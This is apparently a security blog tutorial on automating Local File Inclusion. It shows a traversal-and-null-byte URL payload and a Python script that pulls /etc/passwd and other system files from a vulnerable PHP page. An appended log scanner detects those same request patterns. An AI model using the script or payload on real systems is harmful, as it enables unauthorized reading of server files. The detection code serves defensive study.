Python: Automating Local File Inclusion (LFI)

by Vince
in Blog

The first time you find a page with a Local File Inclusion (LFI) vulnerability, it's like magic. You feed your string into the browser:

http://192.168.150.150/vulnerable.php?page=../../../../../../../../etc/passwd%00

... it spits back the contents of /etc/passwd, you're excited, and you continue enumerating the system.

The last time you found a local file inclusion vulnerability and had to enumerate the system through a browser, it was tedious and you were probably pulling your hair out. Let's take the browser out of the equation.

There are a number of ways to automate this process; I've picked Python.

#!/usr/bin/env python3
import urllib.request

# Base URL including the traversal prefix; each file path below is appended to it.
host = "http://192.168.150.150/vulnerable.php?page=../../../../../../../../.."
# Files to retrieve; the trailing %00 is the null byte that truncates the include path.
path = ["/etc/passwd%00", "/etc/hosts%00"]
path.append("/etc/hostname%00")
path.append("/etc/issue%00")

for x in path:
    # Divider, file name, divider: makes each file easy to find in the scrollback.
    print("-" * 200)
    print(x)
    print("-" * 200)
    print(urllib.request.urlopen(host + x).read().decode("utf-8", "replace"))

Basically, we're retrieving /etc/passwd, /etc/hosts, /etc/hostname, and /etc/issue. I could have put them all on one line, but I wanted to show how it can be done by appending to the list. Plus I like things clean, and the idea of the path scrolling across the page would bug me.

I added a separator: 200 dashes, the name of the file we're retrieving, and 200 more dashes.

Depending on what is vulnerable, I've seen the output come back really clean, and I've also seen it come back really dirty. Either way you still have your divider, and reading it is no different from viewing HTML source.
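The flip side of that script, added here as an example and not part of the original post: a Python 3 log scanner that flags the traversal, null-byte and /etc/ file patterns this post's requests carry, and counts flagged requests per client so the rapid-fire automation stands out. The Apache-style access log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (sample data, not real traffic).
SAMPLE_LOG = """\
192.168.150.1 - - [10/Oct/2023:13:55:36 +0000] "GET /vulnerable.php?page=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1834 "-" "Python-urllib/2.7"
192.168.150.1 - - [10/Oct/2023:13:55:37 +0000] "GET /vulnerable.php?page=../../../../../../../../etc/hosts%00 HTTP/1.1" 200 211 "-" "Python-urllib/2.7"
192.168.150.22 - - [10/Oct/2023:13:56:01 +0000] "GET /vulnerable.php?page=about HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.168.150.22 - - [10/Oct/2023:13:56:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SENSITIVE_RE = re.compile(r"/etc/(passwd|shadow|hosts|hostname|issue)")

def lfi_indicators(target):
    """Return the reasons a request target looks like an LFI probe (empty list if clean)."""
    reasons = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; this also catches double-encoded input
            if "../" in value or "..\\" in value:
                reasons.append(f"{name}: directory traversal")
            if "\x00" in value:
                reasons.append(f"{name}: null byte (%00) truncation")
            if SENSITIVE_RE.search(value):
                reasons.append(f"{name}: sensitive file path")
    return reasons

def scan_log(text):
    """Return (ip, target, status, reasons) for every flagged request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := lfi_indicators(m["target"])):
            # A 200 with a sizeable body on a flagged request means the include most likely worked.
            hits.append((m["ip"], m["target"], int(m["status"]), reasons))
    return hits

def by_source(hits):
    """Count flagged requests per client; a burst from one IP is the signature of a script like the one above."""
    counts = {}
    for ip, *_ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts

if __name__ == "__main__":
    for ip, target, status, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, target, "; ".join(reasons))
```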